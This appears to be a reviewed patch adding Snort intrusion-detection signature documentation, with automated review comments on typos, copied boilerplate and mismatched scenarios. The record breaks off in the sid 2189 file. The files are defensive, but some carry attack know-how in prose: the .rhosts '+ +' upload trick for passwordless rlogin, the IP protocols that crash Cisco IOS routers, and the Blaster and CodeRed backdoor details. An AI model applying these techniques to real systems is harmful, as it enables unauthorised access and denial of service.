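Review bot: 3384.txt is word-for-word identical to 3216.txt apart from the Sid, so an analyst cannot tell why two different sids fired; the Summary or Detailed Information should state what distinguishes this rule (which RPC interface, function or transport it matches). The same `Expoit` typo and the same mismatch between the network-share filename scenario and the malformed-RPC description are carried over.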
--- /dev/null
+++ b/doc/signatures/1926.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1926
+
+--
+Summary:
+This event is generated when a request is made to Network File System (NFS) to list all exported file systems and to indicate which clients are permitted to mount each file system.
+
+--
+Impact:
+Information disclosure.  This can allow an attacker to discover exported NFS file systems and client mount permissions.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a list of exported file systems and client mount permissions.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to list the exported NFS file systems as a precursor to mounting them to read or change a specific file. 
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list exported NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS26
+
+
+--
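Review bot: the corrective action `+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.` is ambiguous about who is being denied; suggest `Filter RPC ports at the firewall so that hosts outside the protected network cannot reach RPC-enabled machines.` The Attack Scenarios line, `+Simple.   ` under Ease of Attack and the filtering line all carry trailing whitespace, and the two blank lines before the closing `--` under Additional References are surplus.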
--- /dev/null
+++ b/doc/signatures/2186.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2186
+
+--
+Summary:
+This event is generated when a suspicious packet using an unusual 
+protocol is sent to a router.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in multiple Cisco IOS versions such that a Denial
+of Service condition can be issued against a device by sending multiple 
+packets using IP protocols 53, 55, 77 and 103 directly to that device.
+
+Cisco IOS processes these packets and under certain circumstances, can 
+be made to incorrectly flag an input interface as being full.
+
+--
+Affected Systems:
+Multiple versions of Cisco IOS.
+
+--
+Attack Scenarios:
+An attacker may send a large number of IP packets using one of the 
+protocols 53, 55, 77 or 103 directly to a router. Exploit code exists.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
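Review bot: `Expoit` in `+Simple. Expoit code exists.` should be `Exploit`, and the sentence repeats `Exploit code exists.` already given at the end of Attack Scenarios; keep it in one place. `Additional References:` is empty although the Detailed Information names a specific Cisco IOS vulnerability (IP protocols 53, 55, 77 and 103); the Cisco advisory should be linked.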
--- /dev/null
+++ b/doc/signatures/2047.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2047
+
+--
+Summary:
+This event is generated when an attempt is made to access an rsync
+module list.
+
+--
+Impact:
+Information gathering. Possible theft of data.
+
+--
+Detailed Information:
+rsync is used to synchronize data between two machines across a network.
+It achieves this by only sending the differences between the files on 
+each host.
+
+Since it does not require both hosts to have the data it is 
+synchronizing, it is possible to retrieve a number of files from one 
+host without the corresponding files being present on the receiving 
+host.
+
+This presents the possibilty of using rsync to receive data from a
+protected machine to an external host.
+
+--
+Affected Systems:
+	All systems using rsync.
+
+--
+Attack Scenarios:
+The attacker needs to make an rsync request for available modules.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+Systems using rsync to coordinate sets of data between hosts not in the 
+same LAN.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Access to files via rsync should be carefully managed using access 
+control lists.
+
+The transfer of files from an internal source to an external one should 
+be carefully managed using the appropriate firewall rules.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+rsync Home:
+http://samba.anu.edu.au/rsync/
+
+University of Washington:
+http://www.washington.edu/imap/buffer.html
+
+--
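Review bot: the second reference, `+University of Washington:` / `+http://www.washington.edu/imap/buffer.html`, has a URL path that refers to IMAP, not rsync, and looks copied from another signature doc; drop it or replace it with an rsync-specific reference. Also `possibilty` in `+This presents the possibilty of using rsync to receive data from a` should be `possibility`.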
--- /dev/null
+++ b/doc/signatures/1894.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1894
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
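Review bot: the `--` separator is missing between `+Authentication is not required to cause the overflow.` and `+Affected Systems:`, which breaks the section format used by every other file in this patch; add a `--` line there. Also `compromize` in the Impact line should be `compromise`, and `+Sid: 1894` puts the value on the heading line while the other files put it on the following line.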
--- /dev/null
+++ b/doc/signatures/2834.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2834
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_replication_package
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
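Review bot: the procedure name is split across lines, `+vulnerability in the procedure generate_replication_package` / `+. This procedure is included in`, leaving a line that begins with a period; join them as `vulnerability in the procedure generate_replication_package. This procedure is included in sys.dbms_repcat_mas.` `+	Oracle Oracle9i` repeats the vendor name (`Oracle9i` is enough), and `Rule: `, `Sid: ` and several `-- ` separators carry trailing whitespace.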
--- /dev/null
+++ b/doc/signatures/100000498.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000498
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Calendarix" application running on a webserver. Access to 
+the file "cal_popup.php" with SQL commands being passed as the "id" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "cal_popup.php" script used by the 
+"Calendarix" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Calendarix
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
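Review bot: the third Detailed Information paragraph (`+This event is generated when an attempt is made to gain unauthorized access to` through `exploited by the attacker.`) is the generic CGI authentication boilerplate and says nothing about SQL injection via the `id` parameter; drop it or rewrite it for this rule. The second paragraph also joins two sentences with a comma (`...for the application, the attacker may also be able to...`), `ona` should be `on a`, and the `--` separators after `100000498`, after `All systems running CGI applications using Calendarix` and after the contributor line lack the blank line used elsewhere.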
--- /dev/null
+++ b/doc/signatures/1531.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1531
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
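Review bot: neither the Summary (`+vulnerability in a CGI web application running on a server.`) nor the Detailed Information names the application, script or parameter that sid 1531 matches, so an analyst cannot map the event to a specific vulnerability; add the application and the file the rule looks for. `ona` in `+access to a CGI application running ona web server. Some applications do` should be `on a`.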
--- /dev/null
+++ b/doc/signatures/2192.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2192
+
+--
+Summary:
+This rule no longer generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+This rule now uses flowbits and can be set to generate an event by
+modifying the rule slightly to remove the "flowbits:no_alert;" option.
+When traffic is detected that attempts to bind to the ISystemActivator
+object in MS RPC DCOM communications this rule now activates sids 2351
+and 2352 to detect exploits against this service. Cool huh?
+
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
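Review bot: the Summary `+This rule no longer generates an event when an attempt is made to exploit a known` reads as though the rule has been retired; the Detailed Information explains it is a flowbits setter that activates sids 2351 and 2352, so the Summary should say that (for example `This rule sets a flowbit when a client binds to the ISystemActivator object over RPC DCOM and enables sids 2351 and 2352; it does not alert by itself.`). `Cool huh?` does not belong in reference documentation, `Expoit` and `propogate` should be `Exploit` and `propagate`, and the Attack Scenarios paragraph about an overly long filename via a network share does not match the RPC bind described above it.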
--- /dev/null
+++ b/doc/signatures/100000815.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000815
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SimpleBoard SBP" application running on a webserver. Access to the file "performs.php" using a remote file being passed as the "sbp" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "sbp" parameter in the "performs.php" script used by the "SimpleBoard SBP" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SimpleBoard SBP
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
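Review bot: the third Detailed Information paragraph (`+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. ...`) and the Attack Scenarios text about supplying credentials to an authentication mechanism are authentication boilerplate that do not describe a remote file include via the `sbp` parameter; the scenario should refer to the remote file passed in `sbp`, as the Summary does. The file also opens with two empty lines before `Rule:`, `ona` should be `on a`, and the `--` after `100000815` and after the Affected Systems line lacks the blank line used elsewhere.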
--- /dev/null
+++ b/doc/signatures/480.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+480
+
+--
+Summary:
+This event is generated when a benevolent ping used by SpeedEra.net to
+find the closest cache to a host is detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+After visiting certain speedera.net sites, several pings will be
+received by the host. These pings are sent so that speedera can find the
+closest cache to the host. This rule is intended to distinguish the
+usually benevolent speedera pings from normal, possibly malevolent pings.
+
+--
+Affected Systems:
+	All systems
+ 
+--
+Attack Scenarios:
+This is not really an attack.  However an attacker could disguise their
+pings as speedera pings, but this is unlikely.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+None required.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Drew Hintz ( http://guh.nu )
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Linux Security:
+http://www.linuxsecurity.com/articles/firewalls_article-2064.html
+
+--
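Review bot: `+Ease of Attack:` / `+Simple.` contradicts `+This is not really an attack.` in Attack Scenarios and `+None required.` in Corrective Action; `N/A.` would match how the policy rule earlier in this patch fills the field. Also the line after `+	All systems` contains only a space, and `SpeedEra.net`, `speedera.net` and `speedera` are capitalised three different ways.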
--- /dev/null
+++ b/doc/signatures/3251.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3251
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
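Review bot: 3251.txt is the third verbatim copy of the 3216.txt text in this patch (3384.txt is the second), differing only in the Sid; the doc should state what this particular rule matches so the three events can be told apart. The mismatch between `+An attacker may make a request for a file with an overly long filename` and the malformed-RPC description, and the `Expoit` typo, are carried over as well.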
--- /dev/null
+++ b/doc/signatures/100000758.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000758
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "QTO File Manager" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "pathext" parameter in the "qtofm.php" script used by the "QTO File Manager" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using QTO File Manager
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
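Review bot: the Impact text (`+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. ...`) and the Detailed Information claim that the attacker may `execute system binaries or malicious code` overstate a cross site scripting issue, which runs script in a visiting user's browser rather than on the server; align both with the Attack Scenarios text about a malicious link stealing information from a user. `attackers` should be `attacker's`, and the `--` lines after `100000758` and after the Affected Systems line lack the blank line used elsewhere.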
--- /dev/null
+++ b/doc/signatures/1256.txt
@@ -0,0 +1,76 @@
+Rule:  
+
+--
+Sid:
+1256
+
+--
+Summary:
+This event is generated when an attempt is made access the root.exe
+executable on a webserver. 
+
+--
+Impact:
+This activity is indicative of a CodeRed worm infection.
+
+--
+Detailed Information:
+As part of the CodeRed infection process, cmd.exe (the windows command
+interpreter) gets copied to a number of locations throughout the
+filesystem and named root.exe.  Following a modification to the registry,
+root.exe becomes available from the web, allowing remote machines to
+execute arbitrary commands.
+
+Only affects Windows machines with a listening webserver, primarily IIS.
+If root.exe does not exist, there is no impact aside from minor iritation.
+If root.exe _does_ exist, full system-level access at the priveledge level
+of the user running the webserver is possible.
+
+--
+Affected Systems:
+	Microsoft IIS web servers.
+ 
+--
+Attack Scenarios:
+Normally, access to root.exe is detected as part of an attempted infection
+by another machine already infected by CodeRed.  In other situations,
+root.exe may be accessed by remote machines/users in an attempt to gain
+access to a system.
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+If root.exe exists in the filesystem of the web server, remove the
+machine from the network and follow the vendor's recommend method for
+cleaning and repairing the damage done by this particular worm.
+
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2001-19.html
+
+--
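Review bot: spelling in the Detailed Information, Corrective Action and Contributors sections: `iritation` should be `irritation`, `priveledge` should be `privilege`, `unkown` should be `unknown`, and `the vendor's recommend method` should be `the vendor's recommended method`. `+Rule:  ` carries trailing spaces and the line after `+	Microsoft IIS web servers.` contains only a space.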
--- /dev/null
+++ b/doc/signatures/1225.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1225
+
+--
+Summary:
+This event is generated when an attempt to exploit a weakness in the authentication mechanism used to connect to an X windows server is made.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+Implementations of the X windows system from the X consortium may use weak authentication methods when allowing remote machines to connect to a host running X windows.
+
+XDM is used to allow remote users access to the remote X window server. When configured incorrectly, this may allow an unathorised user to connect to the display.
+
+--
+Attack Scenarios:
+The remote attacker may scan the host for listening X window servers, then connect to the remote host using XDM.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow connections to X servers from hosts outside the protected network.
+
+Apply the appropriate vendor patches.
+
+Upgrade to the latest version of the software.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0241
+
+CIAC:
+http://ciac.llnl.gov/ciac/bulletins/g-04.shtml
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS396
+
+--
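Review bot: the `Affected Systems:` section is missing entirely between `Detailed Information:` and `Attack Scenarios:`; every other file in this patch has one, so add it (the Detailed Information already names X Window System implementations from the X Consortium using XDM). `unathorised` in `+XDM is used to allow remote users access to the remote X window server. When configured incorrectly, this may allow an unathorised user to connect to the display.` should be `unauthorised`, and `X windows` should read `X Window System` throughout.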
--- /dev/null
+++ b/doc/signatures/888.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+888
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
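Review bot: `+Affected Systems:` is left empty; fill it in or state `Unknown` so the section is not blank. `ona` in `+access to a web server or an application running ona web server. Some` should be `on a`.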
--- /dev/null
+++ b/doc/signatures/335.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 335
+
+-- 
+Summary: 
+This event is generated when an attempt to copy a specific file to an FTP server is made.
+
+-- 
+
+Impact: 
+Serious. An attacker might gain the ability to remotely connect to a server via r-commands without using a password.
+
+--
+Detailed Information:
+This event is generated when an attempt to copy an ".rhosts" file to a server. An ".rhosts" file is used to configure remote access via r-commands (rlogin, rsh, rcp, rexec). 
+
+Specifically, the file might contain IP addresses (hostnames) or usernames that are allowed to connect to a server in the following format: "hostname [username]", where either can be a "+" character, indicating all hostnames or usernames. 
+
+The file might also contain a string "+ +" that indicates that everybody from any IP address is allowed to connect to server without using a password. The file is located in user's home directory.
+
+--
+
+Attack Scenarios: 
+An attacker uploads a ".hosts" file with "+ +" in it in the user's directory on the machine. He is then able to connect to a host via an "rlogin" command without entering a password, resulting in a shell session. If this is done in roots home driectory the attacker will have control of the victim host.
+
+-- 
+
+Ease of Attack: 
+The attack requires an access to any user's home directory via FTP. This means that anonymous FTP access cannot be used for such an attack and a valid username and password is required. Additionally, the ability to upload files via FTP is required for a successful attack.
+
+-- 
+
+False Positives: 
+If the string ".rhosts" is contained within the filename that is being uploaded to a server or within other FTP client responses, the rule will generate an event.
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Locate the uploaded ".rhosts" file and check it for signs of suspicious entries. 
+
+Check the server logs for other suspicious events that might have occurred within the same FTP session
+
+Disallow uploading of files via FTP and use Secure Shell (SSH) for transferring files by users.
+
+Disallow the use of r-commands for file transfer and login procedures.
+
+--
+Contributors: 
+Original rule writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS328
+
+--
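Review bot: the Attack Scenarios paragraph names the uploaded file ".hosts" while the Summary, Detailed Information and Corrective Action all say ".rhosts", which is the name the rule matches on; it should read ".rhosts" here too, and "roots home driectory" should be "root's home directory". Two further points in the same hunk: the first sentence of Detailed Information is a fragment ("This event is generated when an attempt to copy an ".rhosts" file to a server." needs "is made"), and the Ease of Attack claim that anonymous FTP "cannot be used" is stronger than the document supports, since the text itself only requires the file to land "in user's home directory"; if the anonymous account's directory is writable and is a home directory the r-commands consult, the same attack applies, so "normally cannot" with that caveat is safer. In False Positives, "other FTP client responses" should be "FTP commands or server responses", as clients send commands, not responses.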
--- /dev/null
+++ b/doc/signatures/2189.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2189
+
+--
+Summary:
+This event is generated when a suspicious packet using an unusual 
+protocol is sent to a router.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in multiple Cisco IOS versions such that a Denial
+of Service condition can be issued against a device by sending multiple 
+packets using IP protocols 53, 55, 77 and 103 directly to that device.
+
